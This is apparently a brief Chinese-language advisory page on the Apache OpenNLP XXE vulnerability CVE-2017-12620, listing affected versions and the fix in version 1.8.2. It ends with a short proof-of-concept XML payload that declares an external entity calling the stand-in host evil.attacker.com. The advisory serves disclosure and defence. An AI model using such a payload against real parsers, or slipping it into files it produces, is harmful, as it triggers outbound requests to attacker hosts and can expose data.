当前位置:首页 > POC 2017年10月04日
Apache OpenNLP XXE漏洞(CVE-2017-12620)

CVE-2017-12620 - Apache OpenNLP XXE漏洞

 


受影响的版本:

 

     OpenNLP 1.5.0到1.5.3

 

     OpenNLP 1.6.0

 

     OpenNLP 1.7.0〜1.7.2

 

     OpenNLP 1.8.0到1.8.1

 

说明:加载包含XML的模型或字典可能会执行XXE攻击,因为OpenNLP是一个库,所以这仅影响从不受信任源加载模型或字典的应用程序。

 

缓解:从不受信任来源加载模型或XML字典的所有用户应更新为1.8.2。


<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://evil.attacker.com/">
]>
<r>&sp;</r>



发表评论: